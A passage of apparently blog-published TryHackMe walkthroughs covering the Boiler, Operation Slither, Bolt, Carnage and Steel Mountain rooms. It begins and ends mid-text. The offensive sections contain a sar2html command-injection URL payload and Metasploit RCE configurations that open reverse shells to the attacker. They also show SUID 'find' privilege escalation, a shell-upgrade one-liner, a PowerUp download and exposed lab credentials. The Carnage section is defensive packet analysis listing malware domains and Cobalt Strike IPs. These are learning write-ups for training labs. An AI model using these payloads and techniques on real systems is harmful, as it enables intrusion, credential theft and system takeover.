This appeared to be a rotation cipher. Using ROT13, I decoded the message:

This file was a rabbit hole, but it reinforced the room's theme: we need to dig deeper.

The nmap scan gives us a hidden SSH service running on a very high port 55007.

Answer 2

What is on the highest port?

SSH

And looking at port 10000 we can find that is running Webmin.

Answer 3

What's running on port 10000?

Webmin

Service Exploitation Check

I checked the service on port 10000 (Webmin 1.930). While earlier versions had critical unauthenticated vulnerabilities, this specific version usually requires credentials to exploit. Without a valid login, it is not immediately exploitable.

Answer 4

Can you exploit the service running on that port? (yay/nay answer)

Nay

CMS Discovery

I ran a directory brute-force scan to find hidden web applications using gobuster.

I identified a Joomla installation running on the server.

Answer 5

What's CMS can you access?

Joomla

Let’s start enumerating the robots.txt first. These files generally contain valuable information.

But, this time instead of valuable information. There was only rabbit holes. But I noticed the string given at the last in robots.txt it probably contains something:

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075

Decoding

I decided to decode the ASCII decimal values found in robots.txt to see if they hid a credential or a directory.

1. Decimal to ASCII Converting the decimal values (079 084...) to text resulted in a Base64-like string: OTliMDY2MGNkOTVhZGZlMzczMzU0MTgyYmFhNTE1ODQK

2. Base64 Decoding Decoding that string revealed what looked like a hash: 99b0660cd95adfe373354182baa51584

3. Cracking the Hash I identified this as an MD5 hash. Running it through an online cracker (like CrackStation or hashes.com) revealed the plaintext: kidding

This confirmed that robots.txt was a rabbit hole intended to waste time.

Deep Joomla Enumeration

Since the standard web root didn't yield results, I focused my enumeration on the /joomla directory itself to find the "interesting file" mentioned in the tasks.


gobuster dir -u http://10.67.140.32/joomla/ -w /usr/share/wordlists/dirb/common.txt


===============================================================
Starting gobuster in directory enumeration mode
===============================================================
 (Status: 200) [Size: 12457]
.htaccess            (Status: 403) [Size: 303]
.htpasswd            (Status: 403) [Size: 303]
.hta                 (Status: 403) [Size: 298]
_archive             (Status: 301) [Size: 322] [--> http://10.67.140.32/joomla/_archive/]
_database            (Status: 301) [Size: 323] [--> http://10.67.140.32/joomla/_database/]
_files               (Status: 301) [Size: 320] [--> http://10.67.140.32/joomla/_files/]
_test                (Status: 301) [Size: 319] [--> http://10.67.140.32/joomla/_test/]
~www                 (Status: 301) [Size: 318] [--> http://10.67.140.32/joomla/~www/]
administrator        (Status: 301) [Size: 327] [--> http://10.67.140.32/joomla/administrator/]
bin                  (Status: 301) [Size: 317] [--> http://10.67.140.32/joomla/bin/]
build                (Status: 301) [Size: 319] [--> http://10.67.140.32/joomla/build/]
cache                (Status: 301) [Size: 319] [--> http://10.67.140.32/joomla/cache/]
components           (Status: 301) [Size: 324] [--> http://10.67.140.32/joomla/components/]
images               (Status: 301) [Size: 320] [--> http://10.67.140.32/joomla/images/]
includes             (Status: 301) [Size: 322] [--> http://10.67.140.32/joomla/includes/]
index.php            (Status: 200) [Size: 12478]
installation         (Status: 301) [Size: 326] [--> http://10.67.140.32/joomla/installation/]
language             (Status: 301) [Size: 322] [--> http://10.67.140.32/joomla/language/]
layouts              (Status: 301) [Size: 321] [--> http://10.67.140.32/joomla/layouts/]
libraries            (Status: 301) [Size: 323] [--> http://10.67.140.32/joomla/libraries/]
media                (Status: 301) [Size: 319] [--> http://10.67.140.32/joomla/media/]
modules              (Status: 301) [Size: 321] [--> http://10.67.140.32/joomla/modules/]
plugins              (Status: 301) [Size: 321] [--> http://10.67.140.32/joomla/plugins/]
templates            (Status: 301) [Size: 323] [--> http://10.67.140.32/joomla/templates/]
tests                (Status: 301) [Size: 319] [--> http://10.67.140.32/joomla/tests/]
tmp                  (Status: 301) [Size: 317] [--> http://10.67.140.32/joomla/tmp/]
Progress: 4616 / 4616 (100.00%)
===============================================================
Finished
===============================================================

Analyzing the Findings

Among the discovered directories, /_test stood out as non-standard. I navigated to http://10.67.140.32/joomla/_test/ and found a web interface for a tool called sar2html.

Vulnerability Identification

I searched for known vulnerabilities associated with "sar2html" and found a high-severity Remote Code Execution (RCE) exploit on Exploit-DB [ID: 47204].

The vulnerability exists because the application fails to sanitize user input in the plot parameter. By injecting system commands after a semicolon (;), we can execute arbitrary code on the underlying server.

Exploitation: Sar2HTML RCE

To confirm the vulnerability and explore the file system, I crafted a payload to list the contents of the current directory.

Payload:

http://10.67.140.32/joomla/_test/index.php?plot=;ls -la

I executed this URL in the browser. The output of the command was rendered inside the "Select Host" dropdown menu on the page.

The output revealed a file named log.txt.

Answer 6

The interesting file name in the folder?

log.txt

Retrieving Secrets

Now that I knew the target file name, I modified the payload to read its contents using cat.

Payload:

http://10.67.140.32/joomla/_test/index.php?plot=;cat log.txt

Result: The content of the log file appeared in the dropdown menu.

Analyzing the log entries, I found a successful login event that revealed a username and password:

ssh2 #pass: superduperp@$$ Accepted password for basterd

Task 2: Exploitation & Privilege Escalation

SSH Access

Armed with these credentials, I logged into the server using the high port identified earlier.

ssh basterd@10.67.140.32 -p 55007

Internal Enumeration

After verifying my access, I listed the files in the current user's home directory.

I noticed a script named backup.sh.

I examined the contents of the script to see if it contained any sensitive information.

cat backup.sh

Script Content:

REMOTE=1.2.3.4

SOURCE=/home/stoner
TARGET=/usr/local/backup

LOG=/home/stoner/bck.log

DATE=`date +%y\.%m\.%d\.`

USER=stoner
#superduperp@$$no1knows

ssh $USER@$REMOTE mkdir $TARGET/$DATE


if [ -d "$SOURCE" ]; then
    for i in `ls $SOURCE | grep 'data'`;do
             echo "Begining copy of" $i  >> $LOG
             scp  $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
             echo $i "completed" >> $LOG

                if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
                    rm $SOURCE/$i
                    echo $i "removed" >> $LOG
                    echo "####################" >> $LOG
                                else
                                        echo "Copy not complete" >> $LOG
                                        exit 0
                fi
    done


else

    echo "Directory is not present" >> $LOG
    exit 0
fi

The script contained a comment with what appeared to be a password for the user stoner.

[...]
USER=stoner
#superduperp@$$no1knows
[...]

Answer 1

Where was the other users pass stored(no extension, just the name)?

backup

Lateral Movement

Using the password discovered in the backup script (superduperp@$$no1knows), I switched to the user stoner.

su stoner
# Password: superduperp@$$no1knows

Enumerating Stoner's Directory

I listed the files in the new user's home directory to look for the flag.

I found a hidden file named .secret

[!NOTE] Always remember to check for hidden files.

Output:

"You made it till here, well done."

At first, I thought this was a rabbit hole or a troll message. However, after failing to find a user.txt anywhere else, I realized this string IS the flag. The room was playing games with us :)

Answer 2

user.txt

You made it till here, well done.

Privilege Escalation (Root)

Sudo Enumeration

I first checked for sudo privileges to see if I could run any commands as root.

sudo -l

Output:

(root) NOPASSWD: /NotThisTime/MessinWithYa

This was clearly another troll by the creator.

SUID Enumeration

Next, I searched for binaries with the SUID bit set, which allows a user to execute the file with the permissions of its owner (root).

find / -perm /4000 2>/dev/null

I noticed /usr/bin/find in the list. This is a well-known privilege escalation vector (GTFOBins) because find has an -exec flag that can run system commands.

Answer 3

What did you exploit to get the privileged user?

find

Capturing the Root Flag

Since find runs as root, I used it to execute ls and cat on the /root directory, bypassing the permission restrictions.

Answer 4

root.txt

It wasn't that hard, was it?

Conclusion

Boiler is a masterclass in trolling, but it taught me a valuable lesson: Enumeration > Everything. We didn't just find the root flag; we earned it.

We dug deeper: Finding the hidden SSH port on 55007 when standard scans failed.
We enumerated harder: uncovering the Sar2HTML vulnerability buried in a subdirectory.
We escalated smarter: Ignoring the trolls and abusing a classic SUID binary to snatch root.

System Pwned. 🚩

If you dug this write-up, follow along—I've got plenty more boxes to break :)

TryHackMe: Operation Slither Walkthrough

Sat, 31 Jan 2026 00:00:00 GMT

Room Link : https://tryhackme.com/room/operationslitherIU

Introduction

Welcome to my writeup for Operation Slither. This room puts us in the shoes of a digital investigator tracking down a cybercriminal group known as "Sneaky Viper." The group has infiltrated "TryTelecomMe" and exfiltrated sensitive data.

Our mission is to follow the digital trail, starting from a single forum post, to identify the leader, uncover their methods, and retrieve the stolen flags.

Let's dive in!

Task 1: The Leader

Reconnaissance

The investigation began with a lead from a hacker forum. A user going by the handle @v3n0mbyt3_ claimed responsibility for the breach and announced that they would be releasing more data soon.

Initial Intel:

Target Handle: @v3n0mbyt3_
Group Name: Sneaky Viper
Platform: Hacker Forum

To build a profile on this threat actor, I performed a username search across major social media platforms to find where else they might be active.

Social Media Analysis

While the prompt mentioned Twitter/X, I needed to find a different platform. A search for the handle v3n0mbyt3_ led me to a valid profile on Threads.

Answer 1

Aside from Twitter / X, what other platform is used by v3n0mbyt3_? Answer in lowercase.

threads

Decrypting the Communication

I analyzed the target's activity on Threads, looking for leaks or hidden communications. In the Replies tab, I found a suspicious interaction where @v3n0mbyt3_ responded to another user with a long, random string of characters.

The Ciphertext: VEhNe3NsMXRoM3J5X3R3MzN0el80bmRfbDM0a3lfcjNwbDEzcyF9

Observing the string I identified this as likely Base64 encoded text. I used my terminal to decode it.

echo -e 'VEhNe3NsMXRoM3J5X3R3MzN0el80bmRfbDM0a3lfcjNwbDEzcyF9' | base64 -d

This revealed the first flag hidden in plain sight.

Answer 2

What is the value of the flag?

THM{REDACTED}

Task 2: The Sidekick

Connecting the Dots

After identifying the leader, the investigation shifted to finding their accomplice. The forum post mentioned a second operator, but the handle was hidden.

Returning to the Threads conversation where I found the first flag, I examined who @v3n0mbyt3_ was interacting with. The encoded flag was actually a reply to another user: _myst1cv1x3n_.

This identifies the second operator.

Answer 1

What is the username of the second operator talking to v3n0mbyt3 from the previous platform?

_myst1cv1x3n_

Hunting the Flag (The Pivot)

Armed with the handle _myst1cv1x3n_, I searched for their presence on other platforms. I discovered an Instagram profile where the user mentioned they had "Been playing with EDM for a while now" and provided a link to a prototype.

The link directed me to a SoundCloud profile for a user named v1x3n_.

Audio Intelligence

I explored the tracks on the SoundCloud profile. While checking the description of the track "Prototype2", I found a suspicious Base64 string hidden in the comments.

Ciphertext: VEhNe3MwY20xbnRfMDBwcZNjX2Yxbmczcl9tMXNjbDFja30=

Decoding

I used CyberChef to decode the string :

Answer 2

What is the value of the flag?

THM{REDACTED}

Task 3: The Last Operator

Mapping the Network

The investigation led me to the SoundCloud profile of the second operator (v1x3n_). To identify the third member of the "Sneaky Viper" group, I checked the Followers list on that profile.

One account stood out: sh4d0wF4NG.

Checking this user's profile, I saw the bio "EDM / LOFI chill," which matched the interests of the group we observed earlier.

Answer 1

What is the handle of the third operator?

sh4d0wF4NG

Pivoting to Development

With the new handle sh4d0wF4NG, I searched for the user on other platforms. Given the technical nature of the attacks (scripts, infrastructure), I suspected they might use a code repository.

I successfully located the user on GitHub.

Answer 2

What other platform does the third operator use? Answer in lowercase.

github

Secrets in the Commit History

I analyzed the user's repositories. The red-team-infra repository immediately caught my eye as it matched the "Inclusions" list from the forum post (Terraform scripts for phishing infrastructure).

I dove into the Commit History to see if any sensitive data had been accidentally committed and then removed. I noticed a commit involving the terraform.tfstate file. State files often contain sensitive outputs in plaintext.

Reviewing the diff for that file, I found a shadow-password output containing a Base64 string.

Ciphertext: VEhNe3NoNHJwX2Y0bmd6X2wzNGszZF9ibTB0ZHlfcHd9

Final Decryption

I decoded the string to reveal the final flag.

Answer 3

What is the value of the flag?

THM{REDACTED}

Conclusion

Operation Slither was an excellent exercise in digital footprinting and open-source intelligence. We started with a single forum handle and unraveled an entire criminal network by following the connections between their social media profiles.

Key Takeaways:

Cross-Platform Pivoting: Usernames are often reused or linked across platforms (Threads -> Instagram -> SoundCloud -> GitHub).
Network Mapping: Checking "Followers" and "Following" lists is a powerful way to find associates.
Git Forensics: Developers frequently leak secrets in commit history.

Thanks for reading :)

You can check out more of my write-ups at 0xm3dd.github.io.

TryHackMe: Bolt Walkthrough

Thu, 29 Jan 2026 00:00:00 GMT

Room Link : https://tryhackme.com/room/bolt

Introduction

Welcome to my writeup for the Bolt room on TryHackMe. This room focuses on exploiting a newer web technology—specifically Bolt CMS. We will enumerate the application to find credentials, exploit an authenticated Remote Code Execution (RCE) vulnerability, and traverse the system to capture the flags.

Let's dive in!

Enumeration

Nmap Scan

I started by deploying the machine and running a standard Nmap scan to identify open ports and services.

nmap -sV -T5 -sC 10.66.162.114 -o nmap_scan

Here is the raw output from my scan:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
|   256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_  256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
8000/tcp open  http    (PHP 7.2.32-1)
|_http-title: Bolt | A hero is unleashed
|_http-generator: Bolt
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 Not Found
|     Date: Wed, 28 Jan 2026 23:52:07 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: private, must-revalidate
|     Date: Wed, 28 Jan 2026 23:52:07 GMT
|     Content-Type: text/html; charset=UTF-8
|     pragma: no-cache
|     expires: -1
|     X-Debug-Token: ba3989
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     </head>
|     <body>
|     href="#main-content" class="vis
|   GetRequest:
|     HTTP/1.0 200 OK
|     Date: Wed, 28 Jan 2026 23:52:06 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: public, s-maxage=600
|     Date: Wed, 28 Jan 2026 23:52:06 GMT
|     Content-Type: text/html; charset=UTF-8
|     X-Debug-Token: 6ced0c
|     <!doctype html>
|     <html lang="en-GB">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     <link rel="canonical" href="http://0.0.0.0:8000/">
|     </head>
|_    <body class="front">
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

My scan revealed three open ports. Port 80 is hosting a default Apache page, but Port 8000 stands out immediately. The Nmap scripts identified the title "Bolt | A hero is unleashed" and the generator tag "Bolt", confirming that the Bolt CMS is running on this port.

Answer 1

What port number has a web server with a CMS running?

8000

Enumerating the Web Application

I navigated to http://10.66.162.114:8000 to inspect the Bolt CMS directly. The homepage featured a blog post titled "Message From Admin".

Reading through the post, the author explicitly mentions their credentials: "Welcome to this site, myself Jake and my username is bolt."

This gives us a valid username to target.

Answer 2

What is the username we can find in the CMS?

bolt

Finding the Password

After identifying the username, I inspected the page source code (Ctrl+U) to look for further clues.

Hidden within the HTML structure, I found a comment apparently meant for the IT department:

"I suppose this is our secret forum right? ... my password is boltadmin123 just incase you need it!"

Answer 3

What is the password we can find for the username?

boltadmin123

Dashboard Access

With the credentials bolt:boltadmin123, I logged into the administrative panel at /bolt.

Once inside the dashboard, I scrolled to the footer to identify the exact version of the CMS running.

The footer confirms the version is Bolt 3.7.1.

Answer 4

What version of the CMS is installed on the server?

Bolt 3.7.1

Vulnerability Research

Knowing the CMS version (3.7.1) and having valid credentials, I searched Exploit-DB for potential vulnerabilities.

The room hinted at an exploit for a previous version. Searching for "Bolt CMS" revealed an Authenticated Remote Code Execution (RCE) vulnerability for version 3.7.0.

This matches our scenario perfectly since we have a valid login. To find the EDB-ID we can access the exploit and we will find :

Answer 5

There's an exploit for a previous version of this CMS... What's its EDB-ID?

48296

Metasploit Exploitation

With the vulnerability identified, I launched msfconsole to find the corresponding exploit module.

msf > search bolt cms

The search returned a module specifically designed for Authenticated RCE on Linux targets.

I selected the exploit/unix/webapp/bolt_authenticated_rce module.

Answer 6

Metasploit recently added an exploit module for this vulnerability. What's the full path?

exploit/unix/webapp/bolt_authenticated_rce

Exploitation

I configured the exploit with the target details and the credentials I discovered earlier.

msf > use exploit/unix/webapp/bolt_authenticated_rce
msf > set RHOSTS 10.66.162.114 (Target IP)
msf > set RPORT 8000
msf > set USERNAME bolt
msf > set PASSWORD boltadmin123
msf > set LHOST tun0    # My VPN IP
msf > set LPORT 4444

With everything set, I executed the exploit.

msf > run

The exploit authenticated with the CMS, injected a malicious PHP file, and successfully opened a session. I immediately checked my privileges.

[*] Command shell session 1 opened
id
# uid=0(root) gid=0(root) groups=0(root)

Surprisingly, the shell returned uid=0(root). This indicates the web server was running with root privileges, granting us immediate administrative access to the entire system without requiring further privilege escalation.

I upgraded to a fully interactive shell using Python:

	
python3 -c 'import pty; pty.spawn("/bin/bash")'

Capturing the Flag

With root access secured, I located the flag in the /home directory.

Bingo! Our flag found!

Answer 7

Look for flag.txt inside the machine.

THM{REDACTED}

Conclusion

The Bolt room was a great exercise in identifying and exploiting a vulnerability in a modern CMS. By combining standard enumeration techniques (Nmap) with open-source intelligence (reading blog posts for credentials) and vulnerability research (Exploit-DB), we were able to gain authenticated remote code execution.

Key Takeaways:

Enumeration is Key: Reading the actual content of the web application revealed the valid username bolt.
Source Code Analysis: Checking the HTML source code (Ctrl+U) revealed the password boltadmin123 hidden in a developer comment.
Critical Misconfiguration: The web server was running as root, which turned a simple web compromise into a full system takeover immediately, bypassing the need for local privilege escalation.

Thanks for reading :)

TryHackMe: Carnage Walkthrough

Sat, 24 Jan 2026 00:00:00 GMT

Room Link : https://tryhackme.com/room/c2carnage

Introduction

Welcome to my writeup for the Carnage room on TryHackMe. This is a fantastic Medium-difficulty challenge that puts you in the shoes of a SOC analyst. We are given a PCAP file from a confirmed incident where a user, Eric, clicked a malicious link.

My goal was to reconstruct the entire attack chain—from the initial access via phishing to the Command & Control (C2) traffic and final objectives. This room is a great exercise in hunting for Cobalt Strike beacons and Qakbot malware. Let's dive in!

Initial Assessment

Traffic Analysis

I started by opening carnage.pcap in Wireshark(you can find it on Desktop in a folder named Analysis). My first step in any packet analysis is to look at the Protocol Hierarchy and Conversations to get a high-level overview, but for the specific questions, I jumped straight into filtering.

Phishing & Initial Access

To find the start of the attack, I filtered for HTTP traffic to see what the user was browsing.

[!NOTE] To see the answer in the right format you should go to View -> Time Display Format -> UTC Date and Time of Day and look for the time of the first packet.

Answer 1

What was the date and time for the first HTTP connection to the malicious IP? (answer format: yyyy-mm-dd hh:mm:ss)

2021-09-24 16:44:38

Looking closely at this first stream, I noticed the user downloaded a zip file named documents.zip

Answer 2

What is the name of the zip file that was downloaded?

documents.zip

:::tip Phishing emails often deliver zip files containing malicious Office documents to bypass email filters. :::

In the same packet where we found documents.zip, we examine the Host header by looking at the Hypertext Transfer Protocol section.

Answer 3

What was the domain hosting the malicious zip file?

attirenepal.com

So After right clicking on the same packet then Follow -> HTTP Stream you will find some usefull informations.

By extracting the zip file (or just looking at the HTTP response headers), I found it contained a file named chart-1530076946.xls. This confirmed my suspicion: an Excel file likely containing malicious macros.

Answer4

Without downloading the file, what is the name of the file in the zip file?

chart-1530076591.xls

By looking in the exact same packet we can find that the name of the Webserver is found in server within the http header.

Answer 5

What is the name of the webserver of the malicious IP from which the zip file was downloaded?

LiteSpeed

To find the version of LiteSpeed webserver we have to look in x-powered-by within the same http header we found the previous answer.

Answer 6

What is the version of the webserver from the previous question?

PHP/7.2.34

In the next question, the room provides a hint: check HTTPS traffic. Narrow down the timeframe from 16:45:11 to 16:45:30. So I have filtered out the packets for checking just the https traffic , by using :

tls.handshake.type == 1

In the specified time I have found 5 packets , when inspecting its information we can see 3 suspicious domains .

The first one : finejewels.com.au

The second one : thietbiagt.com

The third one : new.americold.com

Answer 7

Malicious files were downloaded to the victim host from multiple domains. What were the three domains involved with this activity?

finejewels.com.au, thietbiagt.com, new.americold.com

To find the Certificate Authority (CA) related with the first domain which is finejewels.com.au We can inspect the packet of this domain by following http stream.

Answer 8

Which certificate authority issued the SSL certificate to the first domain from the previous question?

GoDaddy

In the main menu bar click Statistics, then Conversations. And Ordered results by column Packets.

I found two IPs communicating over HTTPS that looked suspicious. Checking them against the VirusTotal Community tab confirmed they were Cobalt Strike C2s.

First IP : 185.125.204.174

Second IP : 185.106.96.158

Answer 9

What are the two IP addresses of the Cobalt Strike servers? Use VirusTotal (the Community tab) to confirm if IPs are identified as Cobalt Strike C2 servers. (answer format: enter the IP addresses in sequential order)

185.106.96.158, 185.125.204.174

I inspected the Client Hello packet for the first IP (185.106.96.158). The "Server Name" extension (SNI) was set to look like a legitimate service to blend in. You can do this by : Using filter ip.addr == 185.106.96.158. Searching for GET. And following its HTTP Stream.

You can find the Host for the first Cobalt Strike IP also in VirusTotal in Communauty .

Answer 10

What is the Host header for the first Cobalt Strike IP address from the previous question?

ocsp.verisign.com

For the next question It was provided with a hint: Filter out for dns queries. SO we can apply filter: dns.a == 185.106.96.158

Answer 11

What is the domain name for the first IP address of the Cobalt Strike server? You may use VirusTotal to confirm if it's the Cobalt Strike server (check the Community tab).

survmeter.live

For the next question we could use VirusTotal to find its answer.

Answer 12

What is the domain name of the second Cobalt Strike server IP? You may use VirusTotal to confirm if it's the Cobalt Strike server (check the Community tab).

securitybusinpuff.com

For the next question It was provided with a hint: Filter POST HTTP traffic. So we have to apply filter: http.request.method = “POST”.

This was a new idea to me. After the Cobalt Strike beacon, the traffic switched to a new IP (208.91.128.6) and became much "noisier" with unencrypted POST requests. I filtered for http.request.method == "POST" and saw the domain in the Host header immediately.

Answer 13

What is the domain name of the post-infection traffic?

maldivehost.net

Looking at the same packet captured in the previous question. but looking at the URI in the screenshot above, there is a repeating string: /zLIisQRWZI9/.... This is the Campaign ID. So it's clearly the first eleven characters that the victim host sends out to the malicious domain involved in the post-infection traffic.

Answer 14

What are the first eleven characters that the victim host sends out to the malicious domain involved in the post-infection traffic?

zLIisQRWZI9

In the same packet with the same filter , I looked at length filed we can see the length of the first packet.

Answer 15

What was the length for the first packet sent out to the C2 server?

281

I initially tried looking through the packet as normal, but decided to use the Follow HTTP Stream feature. This showed the full server response clearly. The presence of cPanel suggests a compromised shared hosting server!

Answer 16

What was the Server header for the malicious domain from the previous question?

Apache/2.4.49 (cPanel) OpenSSL/1.1.1l mod_bwlimited/1.4

Our victim´s machine is Eric's machine with ip : 10.9.23.102.

Once again, momentarily stumped. I filtered for dns but there were too many packets. I realized malware often uses "ipify" to check its public IP. I refined my filter to dns.qry.name contains "ipify".

You can also filter by api instead of ipify you should find the answer as well.

dns.qry.name contains "api"

Answer 17

The malware used an API to check for the IP address of the victim’s machine. What was the date and time when the DNS query for the IP check domain occurred? (answer format: yyyy-mm-dd hh:mm:ss UTC)

2021-09-24 17:00:04

Based on that we can see the info filed related to this packet and we can find the answer of the next question :

Answer 18

What was the domain in the DNS query from the previous question?

api.ipify.org

For the next question the first thing that came to mind was SMTP, so I filtered down to it. I looked for the first MAIL FROM command in the info column. And i found the answer.

Answer 19

Looks like there was some malicious spam (malspam) activity going on. What was the first MAIL FROM address observed in the traffic?

farshin@mailfa.com

Oh a nice final simple question to finish. All I had to do was check the packet count at the bottom of the window while the smtp filter was active.

Answer 20

How many packets were observed for the SMTP traffic?

1439

And here endeth my writeup. I have thoroughly enjoyed this challenge room — but I have also benefitted from writing this article alongside the process. I feel increasingly confident with using Wireshark, though I am not naïve — there’s a lot more to learn!

I hope to write more of these for challenge rooms to aid my learning process. If you are in a similar position to me and beginning your cyber journey, I recommend you do so too.

TryHackMe: Steel Mountain Walkthrough

Sat, 24 Jan 2026 00:00:00 GMT

Room Link : https://tryhackme.com/room/steelmountain

Introduction

Welcome to my writeup for the Steel Mountain room on TryHackMe. This room is a "Mr. Robot" themed Windows challenge where we will enumerate the machine, gain initial access using Metasploit, and then use PowerShell to enumerate the system for privilege escalation vectors.

Let's dive in!

Task 1 : Introduction

After deploying the machine, I accessed the web server running on port 80 to look for clues.

# Accessing the web server
http://10.66.180.12/

The homepage displayed a picture of the "Employee of the Month". following the hint, I performed a Reverse Image Search on the photo.

Google Images identified the person as Bill Harper (a character from the TV show Mr. Robot).

Answer 1

Who is the employee of the month?

Bill Harper

Task 2 : Initial Access

Nmap Scan

I started by deploying the machine and running a standard Nmap scan to identify open ports.

nmap -sV -T5 -sC 10.66.180.12 -Pn -o nmap_scan

My scan returned a wealth of information. We are dealing with a Windows Server (likely 2008 R2 or 2012 based on the SMB version), and there are several interesting attack vectors exposed.

Here is the relevant output from my scan:

cat nmap_scan


Not shown: 988 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 8.5
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/8.5
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-24T18:50:25+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2026-01-23T18:43:46
|_Not valid after:  2026-07-25T18:43:46
| rdp-ntlm-info:
|   Target_Name: STEELMOUNTAIN
|   NetBIOS_Domain_Name: STEELMOUNTAIN
|   NetBIOS_Computer_Name: STEELMOUNTAIN
|   DNS_Domain_Name: steelmountain
|   DNS_Computer_Name: steelmountain
|   Product_Version: 6.3.9600
|_  System_Time: 2026-01-24T18:50:19+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp  open  http          HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49156/tcp open  msrpc         Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:bd:91:50:6d:e5 (unknown)
| smb2-security-mode:
|   3.0.2:
|_    Message signing enabled but not required
|

Analysis of Open Ports

Web Servers (80 & 8080): The machine is running two web servers.

Port 80: A standard Microsoft IIS 8.5 server.
Port 8080: This stands out immediately. It is running HttpFileServer (HFS) 2.3. This is non-standard software and often a goldmine for vulnerabilities.

Remote Access (3389 & 5985):

Port 3389 (RDP): Remote Desktop is open. If we get credentials, we can log in via GUI.
Port 5985 (WinRM): This is the Windows Remote Management port. This is crucial for PowerShell remoting and often indicates we can execute commands remotely if we find valid credentials.

SMB (139 & 445): Standard Windows file sharing. We might be able to enumerate shares or users here later.

Answer 2

Scan the machine with nmap. What is the other port running a web server on?

8080

Web Server Enumeration (Port 8080)

Nmap identified port 8080 as HttpFileServer 2.3. To get more details, I visited the service in my browser.

The page loaded a file sharing interface. Looking at the page footer (or searching online for "HFS 2.3"), I found a link, When I accessed it I identified the full software name as Rejetto HTTP File Server.

Answer 3

Take a look at the other web server. What file server is running?

Rejetto HTTP File Server

Vulnerability Research

With the software version identified as Rejetto HTTP File Server 2.3 and the hint that suggest using https://www.exploit-db.com/

I navigated to Exploit-DB to check for known vulnerabilities.

I searched for "Rejetto HTTP File Server" and found several results. One specific entry stood out: Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit).

Clicking into the exploit details revealed the CVE number associated with this high-severity Remote Code Execution (RCE) vulnerability.

Answer 4

What is the CVE number to exploit this file server?

2014-6287

Metasploit Exploitation

With the CVE identified (CVE-2014-6287), I launched Metasploit to attempt a remote code execution attack.

msfconsole

First, I searched for the vulnerability module and I selected the exploit/windows/http/rejetto_hfs_exec module. you can use it also by just typing its number identified by # ( msf> use 0)

msf> search 2014-6287

Configuration

I needed to set specific options for the exploit to work: So first I will show the options needed for the exploit.

I found and set 3 important options :

RHOSTS: The target IP (10.66.180.12).
RPORT: Changed to 8080 (since the HFS server is not on the default port 80).
LHOST: My tun0 VPN IP.

Execution

With the payload configured, I ran the exploit.

msf> run
#or exploit

The exploit successfully staged the payload and opened a Meterpreter session.

Retrieving the Flag

Once inside, I verified my user context (STEELMOUNTAIN\bill) and navigated to Bill's desktop to find the user flag.

Answer 5

Use Metasploit to get an initial shell. What is the user flag?

b04763b6fcf51fcd7c13**********

Task 3 : Privilege Escalation

Enumeration with PowerUp

To identify potential privilege escalation vectors, I used the PowerUp.ps1 script.

First, I downloaded the script to my local machine :

 wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

After that I uploaded it to the target via my existing Meterpreter session.

